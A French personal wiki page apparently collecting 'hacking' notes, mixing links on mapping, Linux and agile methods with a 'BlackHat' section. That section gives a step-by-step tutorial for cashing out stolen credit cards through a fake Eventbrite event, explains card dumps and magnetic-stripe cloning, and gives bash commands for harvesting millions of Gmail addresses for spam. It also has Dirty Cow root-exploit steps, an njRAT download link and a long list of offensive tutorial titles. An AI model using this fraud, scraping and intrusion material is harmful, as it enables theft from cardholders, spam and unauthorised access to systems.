Sommaire We make Hack

De Analyse Développement Hacking
Sauter à la navigation Sauter à la recherche
Naviguer dans ce wiki : Accueil du wiki - Objectifs - Administrateur - Bureautique - Développeur - Intégrateur - Marketing - Multimédia - Objets numériques - Jeux - We make Hack
Consulter le site : Accueil du site - Annuaire - Blog - Forum - Outils - Utilisateur     Consulter le Redmine : Accueil du Redmine

Sommaire

Sommaire We make Hack

Les recherches collaboratives et travaux collaboratifs ouverts avec d'autres personnes et communautés.

Méthodes agiles

L'esprit agile est-il en voie de disparaître ?
Treize ans après la publication du manifeste agile, un développeur note l'échec des méthodes agiles.
Source : https://www.developpez.com/actu/68946/L-esprit-agile-est-il-en-voie-de-disparaitre-13-ans-apres-la-publication-du-manifeste-agile-un-developpeur-note-l-echec-des-methodes-agiles/

Partager, améliorer et réutiliser les données publiques

Site officiel : https://www.data.gouv.fr/fr/

OpenCV

OpenCV.

Installer Slackware

The Slackware Linux Project.
Site officiel : www.slackware.com
Documentation officielle : docs.slackware.com
Distribution Live : bear.alienbase.nl/mirrors/slackware/slackware-live/
Vos questions sur : www.linuxquestions.org/questions/slackware-14/

SIG et géolocalisation

ArcGIS logiciel SIG par Environmental Systems Research Institute

ArcGIS logiciel SIG par Environmental Systems Research Institute

3 formes de géolocalisation pour le web

1) GEOIP : une BDD externe qui jumelle ton IP a une région.
2) GOOGLE LOCATION : qui utilise un GPS pour identifier ta location spécifique et maintenant.
3) La géolocalisation HTML 5 : je ne connais pas sont fonctionnement pour identifier la géolocalisation.

Calculer des distances sur une carte de la route

Calculer des distances sur une carte de la route.

Openstreetmap

Les données brutes du projet OpenStreetMap sont accessibles à tous sous licence libre "ODbL".
Cette liberté permet à chacun d’utiliser la base commune pour afficher un plan sur son site web ou pour tout autre usage personnalisé.
Source : http://www.openstreetmap.fr

Données cartographiques complémentaires

Site de l’Institut Géographique National :
http://www.ign.fr
Site de l'Institut National de la Statistique et des Études Économiques :
http://www.insee.fr
Site du Bureau de Recherches Géologiques et Minières :
http://www.brgm.fr
Portail d’accès aux données du BRGM :
http://infoterre.brgm.fr
Site de société Intreatlas, spécialiste de la photographie aérienne :
http://www.interatlas.fr

Alternatives à Google Map

Pour intégrer à un site internet :
https://www.openstreetmap.org
https://leafletjs.com
Pour effectuer une recherche :
https://www.qwant.com/maps

BlackHat

Bypass un captcha

La communauté BitcoinBlackHat propose un solveur de captcha.

Carding

Les docks sont des appareils utilisés par les cardeurs pour cloner de vraies cartes bancaires pour ensuite utiliser des clones comme si on utilisait des cartes authentiques.
Une carte clone est une duplication d'une vraie carte et peut être utilisée comme une vraie carte.
Le dump est une banque de données connectée à un compte bancaire et encodé sur la bande magnétique de la carte bancaire.
Chaque carte est attachée à un compte bancaire.
La carte est le terminal qui permet au propriétaire d'un compte d'accéder au solde de son compte sans avoir à entrer dans une banque.
Les cartes peuvent être utilisées avec ATM ou POS qui sont également des terminaux bancaires.
Si un hacker accède aux informations stockées dans la bande magnétique de la carte, il accède au compte carte du propriétaire et à l'argent économisé.
Voler une décharge de carte n'est pas difficile. Les décharges peuvent être obtenues par écrémage, reniflement ou piratage.
Chaque fois qu'une personne paie avec sa carte, elle assume le risque que les données de sa carte puissent être volées.
Les décharges bancaires ont normalement 3 pistes.
Si l'une des 3 pistes est correcte et qu'il y a une quantité suffisante de fonds sur le compte, alors, la carte est bonne pour être utilisée et la transaction demandée peut être approuvée.

La piste 1

La piste 1 est la seule piste de la carte qui contient le nom du détenteur.
Le cardeur utilise lapiste 1 pour changer le nom de la piste afin de correspondre aux faux identifiants qu'il possède ou avec le nom en relief sur le plastique.
Cette piste est écrite avec un code connu sous le nom de parité impaire ou DEC SIXBIT.

La piste 2

La piste 2 est la piste développée par l'industrie bancaire et c'est la piste la plus intéressante pour un dump.
Presque toutes les vidages fonctionneront si cette piste 2 est correcte. Il est écrit avec un schéma à 5 bits, 4 bits de données et 1 parité.

La piste 3

La piste 3 est pratiquement inutilisée par les principaux réseaux mondiaux.
Elle a été développée par Thrift Saving Industry. Il semblerait que les points de ventes ne lisent pas cette piste.

Code de service

Le code de service de carte est un code de 3 chiffres présent dans la piste 1 et la piste 2.
Chacun des 3 chiffres du code a une signification et lire ces chiffres ensemble comme un code de service nous permet de savoir où et comment la carte peut être utilisée.

Le premier chiffre

1 carte pour un usage international.
2 carte pour un usage international mais avec la puce.
5 carte pour un usage national.
6 carte pour un usage national mais avec la puce.
7 carte qui ne sont pas bonnes pour l'échange sauf pour les accords bilatéraux

Le deuxième chiffre

0 carte est normale, sans restriction.
2 émetteur doit être contacté via des moyens en ligne.
4 émetteur doit être contacté par des moyens en ligne, sauf en vertu d'accords bilatéraux.

Le troisième chiffre

0 pas de restriction mais le code PIN est requis.
1 pas de restrictions.
2 carte pouvant être utilisée pour le paiement des biens et services mais pas pour l'argent.
Utilisation de 3-ATM seulement, le code PIN est requis
4 carte pour retirer des espèces uniquement.
5 carte pouvant être utilisée pour le paiement des biens et services, mais pas pour l'argent mais le code PIN est requis.
6 pas de restrictions, le code PIN doit être utilisé lorsque c'est faisable.
Ainsi, la bande magnétique de la carte ou / et la puce contiennent toutes les informations pour accéder et exploiter un compte bancaire connecté à cette carte.
Si quelqu'un a copié une bande magnétique de carte, cette personne peut utiliser une machine appelée MSR, Magnetic Strip Reader-Writer et écrire les données de la carte sur une autre carte pour utiliser le clone comme carte authentique.
Si vous pensez qu'il est difficile de copier la bande magnétique sur une carte, sachez qu'un simple glissement vers un mini MSR ou un glissement de carte dans un point de vente compromis est tout ce dont les cardeurs ont besoin pour obtenir les données de la carte authentique et obtenir l'accès au compte des propriétaires de la carte. Il n'est donc pas si compliqué d'escroquer une cible à partir de sa carte bancaire dupliquée.
Source originale, en anglais : https://honeymoney24cc.com/dumpscash/

Exemple de technique employée pour faire un cashout

1 TUTO CASHOUT CC => IBAN OU PAYPAL Bonjour a toi cardeur, je vais t expliquer comment sortir de l argent de tes cc en cash. Tout d abord les prérequis : - Une CC fresh - Socks 5 + VPN - Un compte anonyme ou un Paypal anonyme également Le principe : Nous allons créer un événement sur un site (mariage, gala etc.), communiquer cet événement par mail pour remmener des gens sur notre page d achat de billets (sa c est pour passer discret) et ensuite commander gracieusement des places préventes, puis cashout.
2 1- Tout d abord, go sur le site : evenbrite.com, en haut a droite (en bleu) cliquer sur l onglet «créer un événement», rentrer votre adresse mail anon ainsi qu un mot de passe puis cliquer sur «ouvrir un compte». 2- La vous allez créer l événement Rentrer vos informations en fonction du nom de votre compte bancaire ou Paypal et blablater un peu, mettez un logo (sa fait toujours mieux) pour plus de professionnalisme, faite quelque chose de serieux, il faut vraiment que le site est l impression que vous allez faire votre évenement de l année. Pour finir mettez l adresse d une salle dans la ville ou vous allez faire votre prétendu évenement.
3 3- Créer les billets que vous allez ensuite carder Nom du billet : Mettez «Place», quantité et prix en fonction de ce que vous voulez sortir de votre cashout, ne perdez pas votre temps à mettre 5 places a 10, mais ne soyez pas trop gourmand non plus, personnellement je mets 40 places a 20 euros pièces, pour un cashout d environ 800. Sélectionnez l événement que vous voulez et le thème et cliquez sur «billets restants». Puis publiez votre événement. C est bon votre événement est finis, félicitation!
4 4- Maintenant nous allons aller dans «confirmer ses options de paiements» dans la page principale de votre événement. La rien de plus simple, dans «Mode de paiement» vous sélectionnez si vous souhaitez être payer par virement bancaire ou par Paypal. Selon le mode de paiement vous devrez rentrer vos numéros de RIB pour le virement ou les identifiants de votre compte Paypal. 5- Maintenant, et afin d être discret au niveau du site afin qu il enregistre des visiteurs pour l événement, nous allons aller dans la rubrique «inviter et promouvoir».
5 Et la il faut s'amuser à cliquer sur les liens qui redirige vers la page de l événement (chaque jour nous devons remmener des visiteurs) pour faire croire au site a un afflux de visiteurs (tous les jours je le rappelle, c est très important). Donc : - Cliquer pleins de fois sur «Assister a l événement» dans la rubrique «invitation mail» - Cliquez aussi plusieurs fois sur «liens de suivi» et copier coller le lien dans la barre de recherche plusieurs fois, il vous redirigera sur la page de l’événement Après sa vous allez dans graphique, et vous allez voire combien de «visiteurs» il y a eu sur votre événement dans la journée.
6 Le stratagème est la, dés que vous avez acquis assez de faux visiteurs vous pouvez carder allégrement les billets mis en ventes. Vous pouvez donc vous dirigez sur la page de paiement, évidemment pour aller à la page de paiement cliquez sur les liens de redirection, sa fait plus vrai. Je récapitule : Vous avez cliquez 30 ou 40 fois sur les liens de promotions et avez donc acquis 30 ou 40 visiteurs. Noté le lien de suivi sur votre bloc note. (le lien de suivi est le lien de redirection vers la page de votre événement pour les invités) Lancer votre VM, VPN et SOCKS 5, copier-coller le lien de suivi dans Google (pour faire croire a un acheteur qui a été invité) et achetez des tickets. Chaque jour de card doit se dérouler comme suit => Remmener des visiteurs puis carder.
7 Si vous avez fait dérouler votre événement dans 5 jours, remmener chaque jour une trentaine de visiteurs sur votre événement et carder 15 ou 20 billets en fonction du nombre de places et du prix de vente. La cerise sur le gâteau et de ne pas vendre tous les billets pour faire plus vrai. Après avoir cardé les billets toute la semaine, attendez que le site vous vire l argent, environ 5 jours après. Retirer l argent, et voila, vous avez votre première liasse de billets acquis au carding!
Source : https://docplayer.fr/2204699-Tuto-cashout-cc-iban-ou-paypal.html

Forum dédié au carding

De nombreux forums Blackhat dédiés au carding apporteront plus d'informations sur ce sujet.
Carding Team : https://carding.team

Conclusion

On constate après quelques recherches que cette pratique reste potentiellement relativement simple à mettre en oeuvre.
L'utilisation des appareils servant a créer des copies de cartes bancaires semble être réservé à un public autorisé.
Le carding de cartes bancaires est interdit.

Hacker avec Javascript

Hacker avec Javascript.

IP Caméras - Mots de passe par défaut

https://ipvm.com/reports/ip-cameras-default-passwords-directory

Le Phishing

Phishing avec PHP.

Spam avec GMail

Une négligence de la part de Google découverte en 2011. En effet, il est possible de récupérer par le biais d'un sitemap l'ensemble des adresses des profils Google.
Celles-ci, bien que masquées par un ID, redirigent dans la plupart des cas, vers des adresses de la forme https://profiles.google.com/Zer00CooL ou Zer00CooL serait un pseudo utilisé avec Gmail ce qui permet à n'importe qui d'en déduire l'adresse Gmail rattachée au profil consulté.
Voici une méthode avec des commandes bash pour récupérer l'ensemble des 35 millions d'adresses Gmail.
Cette méthode nécessite un espace disque de stockage important. Compter 20 Go ou plus pour être sur de pouvoir télécharger l'ensemble des données.
Pour commencer, on récupère le fameux sitemap de Google :
mkdir google-urls-profile && cd google-urls-profile
wget --quiet http://www.gstatic.com/s2/sitemaps/profiles-sitemap.xml
On parse son contenu pour en extraire uniquement les URLs et on les télécharge :
cat profiles-sitemap.xml | grep "<loc>" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' > list.txt
for url in `grep http list.txt`; do wget --quiet $url; done; 
Au final, on se retrouve avec de nombreux fichiers Sitemap. Les regrouper en un seul fichier :
$ cat sitemap-*.txt > profile-urls.txt
La commande wc nous confirme que nous sommes bien en possession des 35 millions d'URLs pointant vers des profils Google.
$ wc -l profile-urls.txt
35 442 725 profile-urls.txt
Si on inspecte leur contenu, les adresses sont de la forme suivante :
https://profiles.google.com/1171359025719387936
https://profiles.google.com/1120069527109493321
Les données ne sont donc pas exploitables telles quelles, car le profil Google de chaque utilisateur est masqué par un ID (ex: 1171359025719387936) qui ne nous donne aucune indication.
Mais cette adresse redirige, dans la plupart des cas, vers https://profiles.google.com/PSEUDOGMAIL.
En fait, cela est vrai quand un utilisateur a activé le mode "user friendly" dans son compte.
Nous allons être obligés de tester l'ensemble des 35 millions d'URLs ce qui prend pas mal de temps, pour récupérer l'adresse qui se cache derrière cette redirection.
On peut le faire assez facilement avec ce script, nommé getmail.sh :
#!/bin/bash
for url in `cat $1`
do
curl --silent --head $url | grep "^Location:" >> getmail.txt
done
Appeller le script comme ça :
chmod +x getmail.sh
for file in `ls sitemap-*.txt`; do ./getmail.sh $file; rm -f $file; done; 
L'avantage de cette méthode est la suivante :
Si une adresse de profil ne possède pas de redirection, le champ "Location:" donné par la commande curl ne sera pas renseigné.
Cela permet de filtrer uniquement les adresses avec un pseudo Gmail valide.
Une fois le traitement terminé, il ne nous reste plus qu'à rajouter "@gmail.com" à la fin de chaque pseudo, pour construire une liste valide :
cat getmail.txt | awk -F'google.com/' '{print $2"@gmail.com"}' 
Dans ce cas précis, cette méthode a permis de construire une liste de 15 000 adresses Gmail en moins d'une heure.
Je me suis arrêté avant la fin, car je n'ai finalement aucun intérêt à collecter ce genre d'informations.
N'importe qui peut utiliser cette méthode pour constituer une liste d'adresses mail et la revendre à des spammeurs par exemple.
Par Sébastien Bilbeau, publié le 20 mai 2011 : http://www.tux-planet.fr/comment-recuperer-les-35-millions-dadresses-gmail/

Faille Cross-Site Scripting XSS

La faille XSS se situe côté client, le code malicieux est interprété par le navigateur de la victime.
Explication : http://venom630.free.fr/geo/tutz/securite_informatique/xss/
Ressource complémentaire : https://fr.wikipedia.org/wiki/Cross-site_scripting

DNS Spoffing Attaque et contre attaque

RAT

RAT : Remote Administration Tool - Outil d'administration à distance.

Créer un rat en Python

Créer un rat en Python.

Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT

Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT le 2 Mars 2017
Téléchargement njRAT version officielle: https://www.up-4ever.com/jfhzoobp9wvx
hack123

RAT - Informations complémentaires

Source : http://assiste.com.free.fr/p/abc/a/rat_remote_administration_tool.html

Social Recon

Social Recon - Trouver les informations liées à un mail ou un pseudo
Social Recon - Osint Scraper : https://github.com/famavott/osint-scraper
Source : github.com/famavott/osint-scraper
Sous Debian Stretch et Kali Linux 2018
git clone github.com/famavott/osint-scraper.git
cd osint-scraper
apt-cache policy python3
python3: Installé : 3.5.3-1
# Pour Kali Linux
apt-get install python3-venv
# Pour Debian Stretch
apt-get install python-pip
apt-get install python3
apt-get install python3-pip
# En root
# Create a virtual environment in python3 and activating it before you install the requirements.
python3 -m venv ENV
source ENV/bin/activate
pip install -r requirements.txt
pip install -e .
pserve development.ini
Starting server in PID 2408.
Serving on http://localhost:6543
Serving on http://localhost:6543
Une fois la machine redémarrée, relancer le service de la façon suivante :
# Se placer dans le dossier de osint-scraper
python3 -m venv ENV
source ENV/bin/activate
pserve development.ini

Avoir les privilèges de super utilisateur root sous GNU/Linux avec la faille Dirty Cow

Télécharger depuis Github un fichier  zip (CVE-2016-5195) qui nous permettra d'exploiter la faille Dirty Cow.
Source : https//github.com/gbonacini/CVE-2016-5195
cd Desktop             cette ligne de commande est pour naviger vers le bureau
cd CVE-2016-5195       cette ligne de commande est pour entrer dans le dossier CVE-2016-5195
id                     cette ligne de commande vous permettra de savoir que vous etes sous un simple compte utilisateur 
make                   la commande make sans arguments exécute la première règle du Makefile
./dcow                 cette ligne de commande est pour executer l'exploit de Durty Cow.
Après l’exécution de la dernière commande ./dcow , vous aurez pour résultat un mot de passe : "dirtyCowFun" qu'il faut saisir après la commande su après ça vous aurez les privilèges du super utilisateur.
Source : http://www.walidtech.com/2016/11/walidtech-hacking-linux-exploit.html

01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100

Challenge Cryptographie

1+3+3=7

Déchiffrer : 13m07d3p45533572341173
Leet Speak 1337 5p34k ou encore Leet Speak 1337 5|*34|< utilise des caractères et des symboles pour écrire d'une manière peu compréhensible pour un débutant afin de se différencier de lui.
Le principe est d'écrire des caractères avec d'autres graphiquement proches.
Utiliser un outil pour lire ou écrire en Leet Speak : https://www.dcode.fr/leet-speak-1337
Résultat : IEmOTdEpASSEESTREAIITE
La phrase est à convertir en minuscule, et permet alors de connaître le mot de passe.

Challenge Programmation

Renvoi

Challenge de Connexion Web avec Python.

Valider les challenges

Les solutions : http://01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100-solution.blogspot.com
Autres propositions de scripts pour avancer avec les challenges de 01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100.
Le Github de Zer00CooL : https://github.com/ZerooCool/01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100

Warez

Final Fantasy 7.

Support utilisateur

Intégrer un service de support utilisateur avec Livezilla : https://www.livezilla.net/features/en/

Forcer le header d'une page avec PHP quand on ne peut pas le faire avec apache

Il est préférable de configurer les headers depuis le serveur web.
Encoder les fichiers JS, CSS, en utilisant un script PHP qui se charge de renvoyer les fichiers compressés. 
Remplacer les appels aux fichiers JS et CSS habituels par des appels au script PHP suivi du nom de fichier en paramètres.
Exemple de fichier gzip.php a utiliser avec un type de ressource via GET : gzip.php?f=style.css
Le fichier gzip.php :
<?php
ob_start('ob_gzhandler');
$file = isset($_GET['f']) ? $_GET['f'] : null;
switch($file){
case 'style.css':
header("Content-type: text/css");
include('style.css');
break;
case 'ajax.js':
header("Content-type: application/x-javascript\");
include('ajax.js');
break;
}

Cyber Sécurité

Benoît Dupont - Chaire de recherche du Canada en Cybersécurité : https://www.benoitdupont.net

Oletools

Oletools : Outils python pour analyser les fichiers MS OLE2 (stockage structuré, format binaire de fichier composé) et les documents MS Office, pour l'analyse des logiciels malveillants, les analyses judiciaires et le débogage.
Source : https://github.com/decalage2/oletools/

ViperMonkey

Un analyseur et un moteur d'émulation VBA pour analyser les macros malveillantes.
Source : https://github.com/decalage2/ViperMonkey/

Oledump

oledump.py est un programme pour analyser les fichiers OLE (Compound File Binary Format).
Ces fichiers contiennent des flux de données. oledump vous permet d'analyser ces flux.
Source : https://blog.didierstevens.com/programs/oledump-py/

SniffPass

SniffPass est un petit logiciel de surveillance des mots de passe qui écoute votre réseau, enregistre les mots de passe qui transitent par votre adaptateur réseau et les affiche instantanément à l'écran.
SniffPass peut capturer les mots de passe des protocoles suivants: POP3, IMAP4, SMTP, FTP et HTTP (Mots de passe d'authentification non sécurisée.).
Vous pouvez utiliser cet utilitaire pour récupérer les mots de passe Web / FTP / Email perdus.
Source : http://www.nirsoft.net/utils/password_sniffer.html

Sidejacking

Firesheep : le sidejacking pour les nuls.
Firesheep, à sa sortie, a fait l’effet d’une bombe.
Ce concept d’attaque permet assez facilement d’usurper l’identité de quelqu’un en ligne.
C’était ultra-prévisible, et pourtant ça a mis des années à être mis au point : un logiciel qui mette à la portée de tous l’écoute et l’injection de cookies qui circulent sur un réseau local.
Source : http://blog.celeri.net/firesheep-ou-le-sidejacking-a-portee-de-tous/
Télécharger : http://codebutler.github.io/firesheep/

De nombreux exemples d'attaques informatiques

Hack à distance de Windows 10 PC en utilisant TheFatRat
Hack Drupal site Web en utilisant Drupal Module RESTWS code PHP à distance Exécution
Configuration du pare-feu Pentest Lab avec pfsense dans VMware
Configuration du serveur proxy Lab en utilisant Wingate (Partie 2)
Test de pénétration Wifi dans le PC à distance (Partie 1)
Configuration du serveur proxy Lab en utilisant Wingate (Partie 1)
Comment installer Cloud Computing Penetration Testing Lab
Pare-feu de pénétration dans Remote PC de Windows (Partie 3)
Test d'intrusion dans Windows Server Active Directory en utilisant Metasploit (Partie 1)
Capturez VNC session de Remote PC Windows en Payloads Injection
Rassemblez des titres de compétences de WebNMS Framework Server en utilisant Metasploit
Hack PC Windows à distance à l'aide de macros avec Msfvenom
Test de pénétration du pare-feu dans Remote PC de Windows (Partie 2)
Test de pénétration du pare-feu dans Remote PC de Windows (Partie 1)
Hack serveur Web utilisant Tiki Wiki Fichier Unauthenticated Upload Vulnérabilité
Hack PC à distance en utilisant malveillants Documents MS Office
Hack serveur Web à l'aide d'injection de commandes PHP (Smplshllctrlr)
Exploit serveur distant en utilisant Tiki Wiki CMS Command Execution Calendrier
Hack Remote PC Windows en utilisant Regsvr32.exe (.sct) Application Whitelisting Bypass serveur
Hack Wifi utilisant Evil Twin Method avec Linset dans kali Linux
Attaque OpenSSH utilisateur Enumeration Time-Based avec Osueta
Hack Mot de passe en utilisant Rogue Wi-Fi Access Point Attack (WiFi-Citrouille)
Test de pénétration Wifi en utilisant Gerix Wifi Cracker
Hack PC à distance à l'aide de fichiers Microsoft Office (Les Payloads Macro)
Hack Verrouillé Workstation Mot de passe en texte clair
Test de pénétration dans Windows / Active Directory avec Crackmapexec
Hack Démêler NG Firewall en utilisant la vulnérabilité commande d'injection
Comment détecter Sniffer sur votre réseau
3 façons de Crack Wifi en utilisant Pyrit, oclHashcat et Cowpatty
Crack Wifi Mot de passe en utilisant Aircrack-Ng (Guide du débutant)
Hack ne importe quel téléphone Android avec DroidJack (Guide du débutant)
5 façons de Surf Internet Anonymously dans Android Phone
Exploit Linux PC utilisant IPFire Bash Environnement Injection Variable (Shellshock)
Tutorial RAT HTTP pour les débutants
5 façons de créer Backdoor Permanent PC à distance
Exploitation dans le pare-feu Linux utilisant IPFire proxy.cgi RCE
Détecter Hacker en réseau utilisant Android Phone
Cracking WiFi Mot de passe en utilisant Fern WIFi Cracker
Hack Wi-Fi en utilisant l'ingénierie sociale avec Fluxion (Evil Twin Attack)
Réseau sans fil Hack utilisant Airgeddon
Comment faire pour créer Botnet D-Dos Attaque avec UFONet
Automatiser exploitation de PC à distance en utilisant Metasploithelper
Hack PC à distance en utilisant BrowserBackdoor - JavaScript WebSocket Backdoor
Exploiter Injection de commandes OS Web Application utilisant Commix
Hack votre réseau grâce à Android Phone en utilisant cSploit
Bypass All Antivirus et Hack à distance de Windows 10 PC en utilisant Hercules
Hack PC à distance avec Reverse PowerShell en utilisant Brosec
Test de pénétration dans WordPress site Web en utilisant WordPress Exploit Framework
Hacking WordPress en utilisant Ninja Forms Unauthenticated File Upload
Hack WordPress Server en utilisant WordPress SlideShow Gallery assermentée File Upload
Hack Gmail et Facebook Mot de passe dans le réseau en utilisant Bettercap
Les touches rémanentes d'accès backdoor sur le PC à distance avec les touches rémanentes Hunter
Exploit PC à distance en utilisant Advantech WebAccess Dashboard Viewer télécharger Common Image arbitraire File Upload
Hack PC à distance de Windows en utilisant Dell SonicWALL Scrutinizer 11.01 methodDetail Injection SQL
Hack à distance de Windows 10 PC en utilisant Cypher (Ajout d'Shellcode à PE fichiers)
Détecter Vulnerability Scanner en réseau à l'aide KFSensor
Test de pénétration de serveur Web avec DVWA et Metasploit (Guide Débutant)
Comment identifier Réseau vulnérabilités en utilisant Nessus (Guide Débutant)
Détecter Hacker en réseau en utilisant KFSensor Honeypot
Hack Windows Server en réseau à l'aide Atelier Web Remote Command
Hack Drupal Site Server à l'aide de Drupal HTTP Paramètre Key / Value Injection SQL
Hack serveur distant en utilisant WordPress Plugin Foxypress de code arbitraire Exécution
Collecte de l'information en utilisant Maltego (Guide Débutant)
Numérisation de vulnérabilité dans le réseau à l'aide Retina
Hack serveur Web utilisant ATutor 2.2.1 Injection SQL / Remote exécution de code
Hack serveur Web utilisant PHP Utility Belt à distance l'exécution de code
Hack serveur Web utilisant Joomla Header HTTP Unauthenticated Exécution de code à distance
Weeman - Serveur HTTP pour Phishing
Configuration du pare-feu Pentest Lab en utilisant Effacer OS
Hack PC à distance de Windows utilisant Office OLE DLL multiples vulnérabilités de chargement latéral
Hack serveur Web utilisant WordPress WP EasyCart Unrestricted File Upload
Exploit serveur Web utilisant WordPress Infusionsoft Upload Vulnérabilité
Exploit serveur Web utilisant WordPress WPtouch Authenticated File Upload
Exploit serveur Web utilisant WordPress Galerie photo Unrestricted File Upload
Hack serveur Web utilisant WordPress Work Flow Upload Vulnérabilité
Hack serveur Web utilisant WordPress Ajax Charger plus PHP Upload Vulnérabilité
Hack serveur Web utilisant WordPress Reflex Gallery Upload Vulnérabilité
Hack serveur Web utilisant WordPress Site Web N-Media Formulaire de contact avec File Upload Vulnérabilité
Hack à distance Linux PC en utilisant PHPFilemanager 0.9.8 à distance l'exécution de code
Numérisation de vulnérabilité dans WordPress site utilisant WPScan
Configuration Pentest Lab pour Windows Server Environment (Guide Débutant)
Hack Remote PC Windows en utilisant Pcman FTP Server Buffer Overflow - Commande PUT
Hack Remote PC Windows en utilisant le partage de fichiers facile HTTP Server 7.2 SEH Overflow
Rassemblez Browser et information OS de PC à distance en utilisant Http client Exploit
Hack à distance de Windows 10 Mot de passe en texte brut en utilisant WDigest Credential Caching Exploit
Trouver vulnérabilité dans EasyCafe Server en utilisant Metasploit
Hack WhatsApp de personne à travers le code QR (travail)
Trouver vulnérabilité dans Server / Client utilisant Nmap
Hack Fond d'écran de téléphone Android à distance en utilisant Metasploit
Hack des journaux d'appels, SMS, Caméra de téléphone Android à distance en utilisant Metasploit
Hack à distance de Windows 10 PC en utilisant JSRAT
Web Setup Pentest Lab utilisant bWAPP dans Windows 10
DOS Attaque dans le réseau en utilisant Colasoft Packet Builder (Guide Débutant)
Navigateur de configuration Framework Basé pour les tests de pénétration Web dans Kali Linux (Mantra Toolkit)
Configuration Web Penetration Testing Lab utilisant Framework Mth3l3m3nt OWASP
Configuration du Lab de pénétration Web en utilisant WebGoat dans kali Linux
Hack à distance de Windows 10 PC en utilisant ARCANUS (Bypass All Antivirus)
Web Setup Pentest Lab utilisant Cassé Applications Web (Guide Débutant)
Exploit de Windows 10 PC en utilisant msfven.sh Script
Web Setup Hacking Lab utilisant DVNA Kali Linux
Web configuration Pentest Lab pour les débutants en utilisant DVWS
Comment vyos Setup (Virtual Router Pentest Lab)
3 façons de pirater Telnet passsword de PC à distance
Wifi Investigation Forensic utilisant Wifihistoryview
Web Setup Penetest Lab pour les débutants utilisant DVWA et OWASP Mutillidae II
Hack à distance de Windows 10 PC à l'aide Discover Tool
Hack à distance Linux PC à l'aide de fichiers PHP
5 façons de pirater le service FTP sur PC à distance
2 façons de pirater le Bureau à distance Mot de passe en utilisant kali Linux
Numérisation réseau en utilisant NMAP (Guide Débutant)
Comment configurer Démêler pare-feu pour la sécurité du réseau (Guide Débutant)
4 façons de pirater service SSH sur PC à distance
Exploit à distance de Windows PC en utilisant PSploitGen
Hack à distance de Windows 10 PC en utilisant psmsf
Hack PC à distance en utilisant DarkComet RAT avec Metasploit
Exploit Windows PC à distance en utilisant HTA Attaque avec Net Tools
Trouver le routeur vulnérable sur Internet en utilisant RouterhunterBR
2 façons de pirater de Windows 10 Mot de passe Easy Way
Exploit à distance de Windows PC en utilisant ps1encodeTool
3 façons de capturer Mot de passe HTTP dans le réseau PC
Denial of Service Attack sur le réseau PC en utilisant SET Toolkit
Hack PC à distance avec nettool MitM pentesting Toolkit
Hack Gmail ou Facebook Mot de passe de PC à distance en utilisant NetRipper Exploitation Outil
Exploitation de Windows PC en utilisant Venom: Shellcode Générateur
Hack PC à distance avec fichier PHP en utilisant cadre PHPSploit Furtif Post-Exploitation
Hack Windows PC à distance avec VNC clavier de code à distance Exécution
Hack Remote PC Windows ou Linux en utilisant MPC
Privilege Escalation sur Windows 7,8,10, Server 2008, Server 2012 à l'aide de pommes de terre
Hack Windows 7 Mot de passe du compte invité en utilisant 2015-1701 Exploit (Easy Way)
Hack à distance Windows, Linux PC et téléphone Android en utilisant Msfvenom
Winpayloads: Indétectable de Windows Payload Generation
SimplyEmail: Email Recon Tools (Email Footprinting)
Killchain: Une collection de puissants outils de piratage
Comment faire pour créer un dossier illimité Victim Remote PC en utilisant Metasploit
Comment l'accès non autorisé sur PC à distance en utilisant Metasploit
Comment recueillir des informations de Antivirus en Victim Remote PC en utilisant Metasploit
Hack PC à distance de Windows en utilisant ManageEngine OpManager à distance l'exécution de code
Hack Remote PC de Windows Gérer Desktop Engine Central 9 File Upload Servlet Connection Id Vulnérabilité
Hack Gmail et Facebook de PC à distance en utilisant Spoofing DNS et SET Toolkit
Hack PC à distance avec HTA Attack dans SET Toolkit
Wifi Hacking avec Evil Twin Attaque en utilisant Linset
Hack mot de passe Windows en texte clair en utilisant Mimikatz et informations d'identification de Windows Editor
Détournement de session en utilisant Ettercap, Hamster et Ferret (A Guide Débutant)
Hack PC à distance en utilisant WinRAR SFX code à distance la vulnérabilité d'exécution
Hack Remote PC Windows en utilisant l'usine de Backdoor avec Metasploit
Hack PC à distance en utilisant Faux Scam Mises à jour avec Ettercap et Metasploit
Hacking avec Empire - PowerShell Post-Exploitation Agent
Hack Remote PC Windows en utilisant Script Web Livraison
Comment Hack de Windows Fond d'écran de PC à distance
Hack Android Phone WhatsApp et tous les répertoires à l'aide de Mercury Navigateur Vulnérabilité
Hack PC à distance avec filigrane Master Buffer Overflow (SEH)
Hack PC à distance en utilisant Pupy - Outil d'administration à distance
Comment afficher tous les Exploits possibles dans Victim PC utilisant Windows Exploit-Suggester
Hack Windows Remote PC en utilisant PDF Shaper Buffer Overflow
Hack Remote PC Windows en utilisant l'utilitaire FTP Konica Minolta 1,00 Poster Auth CWD Commande SEH Overflow
Hack PC à distance de Windows en utilisant MS15-100 Microsoft Windows Media Center MCL Vulnérabilité
Comment Hack sessions sauvegardées dans Putty en utilisant Metasploit
Hack PC à distance en utilisant Firefox PDF.js Privileged Javascript Injection
Windows 7 Post Key Hack Attack en utilisant Metasploit
Hack PC à distance de Windows en utilisant la vidéo Charge studio Buffer Overflow (de SEH)
Magie Unicorn - PowerShell Downgrade Attaque et outil de l'exploitation
Hack PC Windows ou Linux en utilisant ByteArray Adobe Flash Player Utilisation Après gratuit
Hack PC Windows ou Linux en utilisant Adobe Flash fond opaque Utilisation Après gratuit
Comment Rassemblez WIFI mot de passe dans Windows PC à distance
Bypass Antivirus et Hack Remote PC Windows avec un abri
Hack PC à distance en utilisant Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
Hack PC à distance de Windows en utilisant Adobe Flash Player Dessin Remplissez Shader corruption de mémoire
Hack Browsers, chat, bases de données, Mails, Wifi passe à distance PC Windows ou Linux
Hack Remote PC Windows en utilisant Windows Client Copier l'image win32k Exploit
Hack du mot de passe en texte brut du PC à distance de Windows
Mot de passe Hack enregistrées dans Windows et Linux PC utilisant LaZagne Project
Hack PC à distance de Windows en utilisant Adobe Flash Player ShaderJob Buffer Overflow
Hack PC à distance de Windows en utilisant Adobe Flash Player domainMemory ByteArray Utilisation Après gratuit
